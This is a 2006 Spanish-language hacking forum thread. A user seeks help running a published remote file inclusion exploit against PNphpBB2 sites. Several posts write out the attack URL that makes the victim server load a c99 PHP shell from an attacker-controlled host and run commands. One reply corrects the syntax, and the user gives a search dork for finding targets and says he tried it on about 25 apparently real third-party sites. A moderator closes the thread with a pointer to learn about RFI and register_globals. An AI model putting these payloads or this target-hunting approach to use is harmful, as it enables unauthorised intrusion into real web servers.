elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
14 Febrero 2012, 03:03  


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderador: berz3k)
| | |-+  ayuda con este exploit
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: ayuda con este exploit  (Leído 2,099 veces)
jbhz

Desconectado Desconectado

Mensajes: 27


Ver Perfil
ayuda con este exploit
« en: 19 Septiembre 2006, 07:45 »

 :-X siento que me van a abuchear, pero me he leido los topics de aqui, y aun no comprendo...

es sobre las shells remotas...

estoy intentando utilizar este exploit
http://www.milw0rm.com/exploits/2390

pero donde dice:
http://www.victim.com/[pn_phpbb]/includes/functions_admin.php?phpbb_root_path=http://yourdomain.com/shell.txt?

eso es lo que no logro comprender, me he creado una shell con cyberspace.org, pero no supe como agregarla al link.

en pocas palabras, algien me podria explicar como tener esa shell que marca el exploit?

dijamos que yo ya cuento con el domain claro...
« Última modificación: 19 Septiembre 2006, 20:09 por jbhz » En línea
Neobius


Desconectado Desconectado

Mensajes: 2.082


Viva Linux!


Ver Perfil
Re: ayuda con este xploit
« Respuesta #1 en: 19 Septiembre 2006, 18:42 »

Me parece que tu no te has enterado mucho de como funciona ese exploit. Has de saber de la existencia de shells php, que se ejecutan en un servidor remoto mediante alguna vulnerabilidad XSS, que es la que tu quieres explotar mediante ese exploit.

Mira este post, quizas te sirva de algo:

video deface Integramod Portal
http://foro.elhacker.net/index.php/topic,139252.0.html

PD: Se dice exploit no xploit.
En línea



Todos somos muy ignorantes, lo que ocurre es que no todos ignoramos lo mismo.
Albert Einstein

Recuerda: El arca de Noe fue construida por aficionados, el titanic por profesionales

http://neobius.blogspot.com
jbhz

Desconectado Desconectado

Mensajes: 27


Ver Perfil
Re: ayuda con este xploit
« Respuesta #2 en: 19 Septiembre 2006, 20:09 »

ok, ya tengo mi shell, pero ya van varias paginas que pruebo (recalcando que son paginas que no se han actualizado desde el 2004)

y me dice "no se encuentra esta pagina" cuando intento meter el exploit...

que estare haciendo mal?

aqui la sintaxis que utilizo:

http://www.(webatacada).com/[pn_phpbb]/includes/functions_admin.php?phpbb_root_path=http://usuarios/lycos/(miusuario)/c99.txt?$cmd=ls

en google pongo: powered by PNphpBB2

PD: NO SE VE EL VIDEO jeje
En línea
Ivanchuk


Desconectado Desconectado

Mensajes: 458


LLVM


Ver Perfil WWW
Re: ayuda con este exploit
« Respuesta #3 en: 19 Septiembre 2006, 20:51 »

Holas. Eso no es XSS, es RFI. Tenes mal la sintaxis:
http://www.(webatacada).com/[pn_phpbb]/includes/functions_admin.php?phpbb_root_path=http://usuarios/lycos/(miusuario)/c99.txt?cmd=ls&noimporta=
Saludos.
En línea

Sólo quien practica lo absurdo puede lograr lo imposible.

Join us @ http://foro.h-sec.org
jbhz

Desconectado Desconectado

Mensajes: 27


Ver Perfil
Re: ayuda con este exploit
« Respuesta #4 en: 20 Septiembre 2006, 04:51 »

 :-X  una duda


la diferencia esta en que al final va: NOIMPORTA=

pero, podrias explicarlo? porque lleva noimporta=? digo, para saber lo que hago y no ser solo un sriptkiddie... ;D
En línea
jbhz

Desconectado Desconectado

Mensajes: 27


Ver Perfil
Re: ayuda con este exploit
« Respuesta #5 en: 20 Septiembre 2006, 05:39 »

lamento decirlo, pero nomas no con esa sintaxis...

funciono solamente en un sitio, de 25 aprox que probe...

pero en el sitio, al parecer se esta abriendo un flash, que nunca termina de cargarse xD

algo estara mal en la sintaxis?
En línea
sirdarckcat
Troll Buena Onda y
CoAdmin
***
Desconectado Desconectado

Mensajes: 6.946


Lavando Platos


Ver Perfil WWW
Re: ayuda con este exploit
« Respuesta #6 en: 20 Septiembre 2006, 13:46 »

¿que tal si aprenden PHP y ven donde esta el bug?
busquen informacion sobre RFI (Remote File Inclusion), sobre que es register globals, y porque es inseguro tenerlo activado.. y como se aplica al bug que quieres explotar.

tema cerrado.

Saludos!!
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
ayuda con este exploit command ejecution
Nivel Web
antoniocaro 1 654 Último mensaje 17 Julio 2011, 06:44
por Shell Root
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines